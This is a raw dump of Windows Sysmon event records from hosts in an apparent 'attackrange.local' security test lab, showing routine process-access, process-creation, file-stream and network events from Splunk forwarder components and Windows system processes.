08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.562{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.562{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.562{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.564{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.299{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B1F6BFEEBFF9332B35B384A633E3BB,SHA256=CCA7061F151DE926B6BB426BBA997A566D0E26EBCD7BF5ACD8296F6BE8FF101A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.298{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C48E25A973AF1552D54B61AAC9B0966,SHA256=CAE9C9ACB928036FECF5A32DDD6B956D553CBC77CAC321D32718F365A6AF597D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:43.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51176-false10.0.1.12-8000- 10341000x80000000000000001052819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.848{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.833{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.834{466BC892-F72C-60EB-BF7D-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B127F9C28A70041C09E0163D5F124C55,SHA256=5B3FF8F6AB052D91CDD3A0D9FE5A394DCEE48E3266432962DDD0CFB7399F12BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:52.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DFABBBB7CF601E797AC1EC663495284,SHA256=0116421991400AFC7A4CDD9B4B68E19312B988ED436BA29177A2E2665B6E9E6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.578{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84B1F6BFEEBFF9332B35B384A633E3BB,SHA256=CCA7061F151DE926B6BB426BBA997A566D0E26EBCD7BF5ACD8296F6BE8FF101A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.263{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.247{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:52.248{466BC892-F72C-60EB-BE7D-00000000CF01}4072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:53.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1E077335D87BBE5E1FC899CBE62D7F,SHA256=C1173B81B1370B237464F605DBAEC24D4FF0AAE8F2ADE24430368BE53C79CA29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D30DC0BFCC6AE9FFC6E6ED7E840ED6C5,SHA256=73EE279D6DA8D1CEBABF89738FF9A2E8988D6A5F98754BE27FD04CDCF56F1C62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.780{466BC892-F72D-60EB-C07D-00000000CF01}88769760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.664{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB731F80BF7C221A6D878D876105C8F,SHA256=48AD2A687211F0713D214259C9269847564178C8ADC6EB3651F724E6531AE7CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:53.548{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72D-60EB-C07D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 